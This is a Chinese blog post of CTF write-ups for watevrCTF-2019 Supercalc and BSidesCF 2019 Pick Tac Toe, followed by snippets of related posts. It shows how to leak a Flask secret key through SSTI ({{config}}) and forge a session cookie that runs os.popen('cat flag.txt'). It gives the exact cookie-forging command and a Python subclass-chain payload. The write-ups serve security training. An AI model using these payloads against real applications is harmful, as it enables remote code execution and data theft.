[watevrCTF-2019]Supercalc

于 2023-06-01 22:50:20 发布
阅读量269 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/130997508
版权

[watevrCTF-2019]Supercalc

1.查看后就只有一个计算界面,盲猜ssti发现不行,几乎都有过滤。

2.抓包查看cookie发现session,解密后该值是我们历史计算的表达式,我们每执行一遍,历史代码都会记录在session中,并计算后返回到页面。虽然界面有waf不能执行代码,但是如果可以修改cookie的值,那不就可以绕过waf了。

3.接下来就是查找密钥,爆破是没用的,那就只能用页面的功能看看是否能读取密钥。查看wp后发现,只要在表达式后加个#符,就能执行ssti,不过其他的依旧还是被过滤了,不过能访问{{config}},就能读取密钥为cded826a1e89925035cc05f0907855f7

4.再接下来就是伪造session了,先构造要执行的代码__import__("os").popen("cat flag.txt").read(),然后利用脚本生成替换即可读取flag。

python flask_session_cookie_manager3.py encode  -s 'cded826a1e89925035cc05f0907855f7' -t '{"history":[{"code":"__import__(\"os\").popen(\"cat flag.txt\").read()"}]}'

[BSidesCF 2019]Pick Tac Toe

1.点击页面查看cookie以为又是伪造,但是查看源码发现了隐藏表单,然后执行/move,尝试发送一个,发现是三子棋。

2.那段cookie毫无头绪,但是井字棋这方面还是很精通,试着下了两把,误打误撞赢了得到了flag。后面才发现原来AI下棋的值是存在覆盖的,可以直接覆盖掉ai下的坑位给连为一条直线。

光迹ovo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[watevrCTF-2019]Supercalc 1
shinygod的博客
03-02 571
知识点:flask-session伪造*,key值寻找 目录解密:加密伪造:分析解题 解密: exp python3 flask_session.py decode -c '你的session' 加密伪造: python3 flask_session_cookie_manager3.py encode -s "key" -t "{'history':[{'code':'__import__(os).system(\"ls \")'}]}"``` 或者直接用下面的直接构造 from flask.sess
BUUCTF--[watevrCTF-2019]Supercalc
qq_46263951的博客
08-12 295
打开页面后发现其功能是进行计算 使用jwt解析可以发现我们所提交的内容在session中 通过1/0进行报错,用#注释来进行绕过, 执行命令可以得到加密session时所需的key 根据上面的测试我们可以知道这里是一个Flask_SSTI,所以使用flask-session-cookie加密脚本 使用ls命令查看当前目录下的所有文件 python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f09078..
BUUCTF [watevrCTF-2019] Supercalc
Senimo
12-20 803
BUUCTF [watevrCTF-2019] Supercalc 考点: session伪造 通过session拼接语句 {{config}}获取SECRET_KEY的值 启动环境: 是一个类似计算机的功能,又一个输入框,尝试输入1+1: 得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集 在HTTP请求中,查看到Cookie信息: 可以获取到session: session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArI
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
02-04
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
[2019watevrCTF]Supercalc wireup
ShenZ的博客
01-19 266
[2019watevrCTF]Supercalc wireup calc!这个界面看着就像ssti <class 'os._wrap_close'>是118个 利用os._wrap_close类中的popen读取目录 ''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('ls').read() __import__("os").popen("cat flag.txt").read()
[watevrCTF-2019]Supercalc flask-cookie伪造&SSTI
a3320315的博客
02-12 1948
题目 buu新上的题目,晚上没啥事情就做了一下~~ 打开页面是一个计算器 可以执行一些简单的运算,我们还是老实地按步骤走,先扫下目录,没发现什么东西,然后查看header,源码等,都没有发现思路,然后我们看了一下cookie 这个凭直觉都知道是flask的cooike,然后我们放到脚本里面解一下 这不是我们先前的计算么? 那么思路就很明显了,肯定是伪造cooike,那么我们就不必须拿到key才可...
[watevrCTF-2019]Pickle Store
errorr0
05-19 681
巩固pickle反序列化
CCF CSP攻克之路 —— 2014_12
努力上进的小叶
02-09 404
CCF CSP 2014_121:门禁系统()1.1 题目1.2 代码与解答2: Z字形扫描(60/)2.1 题目2.2 代码与解答3: 集合竞价3.1 题目3.2 代码与解答4: 最优灌溉4.1 题目4.2 代码与解答5: 货物调度5.1 题目5.2 代码与解答 1:门禁系统() 1.1 题目 1.2 代码与解答 #include<bits/stdc++.h> using nam...
[buuctf.reverse] 116_[watevrCTF 2019]esreveR
weixin_52640415的博客
06-13 335
动调的简单小题
[buuctf.reverse] 100_[watevrCTF 2019]Repyc
weixin_52640415的博客
05-20 278
python 虚拟机
【re】 watevrCTF2019_Repyc
Nothing
12-16 540
这题给了个pyc。先用uncompyle反编译成py。 uncompyle6 3nohtyp.pyc >>sss.py 打开,然后惊了。 # uncompyle6 version 3.6.0 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.8.0 (default, Oct 23 2019, 18:51:26) # ...
[watevrCTF 2019]Crypto over the intrawebs
qq_52193383的博客
08-13 231
因为每次发送的消息都有固定头部,所以可以利用这一特征求出 key。利用z3构造多个方程求解。由于^运算的参与,不能使用Int(‘x’),需使用比特流BitVec(‘x’,bit)。由key的生成过程可知 key 最多 76bits。......
[watevrCTF 2019]Repyc
0.2°的博客
09-15 267
[watevrCTF 2019]Repyc复现 拿到题是个pyc python反编译后得到 佤 = 0 侰 = ~佤 * ~佤 俴 = 侰 + 侰 def 䯂(䵦): 굴 = 佤 굿 = 佤 괠 = [佤] * 俴 ** (俴 * 俴) 궓 = [佤] * 100 괣 = [] while 䵦[굴][佤] != '듃': 굸 = 䵦[굴][佤].lower() 亀 = 䵦[굴][侰:] if 굸 == '뉃':
[watevrCTF 2019]Repyc [NPUCTF2020]BasicASM
寻梦&之璐
06-04 846
[watevrCTF 2019]Repyc 佤 = 0 侰 = ~佤 * ~佤 俴 = 侰 + 侰 def 䯂(䵦): 굴 = 佤 굿 = 佤 괠 = [佤] * 俴 ** (俴 * 俴) 궓 = [佤] * 100 괣 = [] while 䵦[굴][佤] != '듃': 굸 = 䵦[굴][佤].lower() 亀 = 䵦[굴][侰:] if 굸 == '뉃': 괠[亀[佤]] = 괠
watevrCTF 2019 Repyc
Misaka10046的博客
12-19 509
uncompyle6 version 3.7.4 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.7.8 (tags/v3.7.8:4b47a5b6ba, Jun 28 2020, 08:53:46) [MSC v.1916 64 bit (AMD64)] # Embedded file name: circ.py # Compiled at: 2019-12-14 02:29:55 # Size of source mod 2**32: 5
2020/7/27 - [watevrCTF-2019]Cookie Store - 伪造cookie
抒情诗
07-27 1062
一开始还以为这是一个很难的题目,没想到就是一个简单的COOkIe伪造。 1.伪造cookie 根据他的题目提示,这可能是一道伪造cookie的题,所以先用burpsuIte进行抓包。 买这个一块钱的先试一下,结果: 很明显看到了我们剩余的钱数是50,改成500,再把post的数据id=0改为id=2用来买我们的3号商品flag。 2.获得flag forward之后有如下内容: 很明显session是一个base64,直接解码后获得flag ...
python反序列化-[watevrCTF-2019]Pickle Store
最新发布
snowlyzz的博客
09-01 853
详细讲解pickle
SSTI 服务端模板注入 / 沙盒逃逸
Kaleido76的博客
02-16 518
这个部分之前一直只会生搬硬套,其实到底是什么回事都不太清楚,这次查了很多资料,把这部分内容的思路整理一下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值